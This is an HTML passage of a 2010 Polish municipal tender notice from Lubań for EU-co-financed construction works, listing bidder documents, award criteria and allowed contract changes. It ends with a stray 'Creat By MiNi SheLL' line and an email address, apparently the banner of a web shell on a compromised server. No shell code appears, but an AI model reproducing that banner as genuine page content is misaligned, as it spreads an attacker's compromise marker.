<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Formularz Oferty, sporządzony zgodnie ze wzorem stanowiącym załącznik do niniejszej SIWZ bądź też przygotowany przez Wykonawcę w treści zgodnej z SIWZ, b)Kosztorys ofertowy sporzadzony w oparciu o przedmiar robót i Specyfikację techniczną wykonania i odbioru robót, c) stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej, d) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego, e) zobowiązanie innych podmiotów wskazanych w ofercie do współpracy lub oddania mu do dyspoozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (jeżeli dotyczy). f) Zalecane jest dołączenie dowodu wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art.144 u.p.z.p. Zamawiający dopuszcza zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: 1) zlecenie robót dodatkowych i zamiennych związanych z: a) aktualizacją lub zmianą dokumentacji projektowej, b) kolizją z niezinwentaryzowanymi podziemnymi sieciami lub innymi obiektami podziemnymi, c) istotnymi wadami lub/i brakami dokumentacji projektowej, d) wystąpieniem okoliczności niemożliwych do przewidzenia, przez zamawiającego i doświadczonego wykonawcę przed podpisaniem umowy, e) rezygnacją z części prac, ograniczenia zakres umowy podstawowej w sytuacji, gdy zmiany te będą korzystne dla zamawiającego, f) dokonaniem odkrycia (w trakcie prowadzonych robót objętych zamówieniem) zniszczeń murów i pęknięć konstrukcyjnych, g) dokonaniem odsłonięcia (w trakcie prowadzonych robót objętych zamówieniem) zabytkowych elementów kamiennych lub innych cennych detali architektonicznych o znaczeniu historycznym i konieczności wykonania dodatkowych zaleceń Wojewódzkiego Konserwatora Zabytków. 2) zmiana terminu wykonania zamówienia oraz harmonogramu rzeczowo- finansowego realizacji robót: a) w przypadku zlecenia robót dodatkowych i zamiennych, b) spowodowane warunkami atmosferycznymi, w szczególności klęskami żywiołowymi, warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót budowlanych, zgodnie z wymogami technologicznymi, c) spowodowane wstrzymaniem robót przez zamawiającego, d) spowodowane koniecznością usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej, e) spowodowane przekazanie placu budowy z opóźnieniem. f) spowodowane innymi przyczynami zewnętrznymi niezależnymi od zamawiającego i wykonawcy skutkujące niemożliwością uzyskania stosownych decyzji, zezwoleń, uzgodnień itp. 3) zmiany osobowe, przy pomocy których wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach, a także w SIWZ w przypadku: a) śmierci, choroby lub innych zdarzeń losowych osób, b) nie wywiązywania się osób z obowiązków wynikających z umowy, c) rezygnacji tych osób z wykonywania swoich obowiązków. 4) zmiana podwykonawcy robót przy pomocy, którego wykonawca realizuje przedmiot umowy, na innego w przypadku: a) nie wywiązywania się podwykonawców wskazanych w ofercie wykonawcy ze swoich obowiązków, b) rezygnacji tych podwykonawców z wykonywania swych obowiązków. Wprowadzone zmiany do umowy wymagają ich odpowiedniego udokumentowania i zawarcia stosownego aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um-luban.dolnyslask.pl/index.php?idmp=23&r=r<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Techniczno Inwestycyjny Urzędu Miasta Lubań Plac Lompy 1; 59-800 Lubań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2010 godzina 12:00, miejsce: Wydział Techniczno Inwestycyjny Urzędu Miasta Lubań Plac Lompy 1 59-800 Lubań.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 Priorytet 9. Działanie 9.1.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com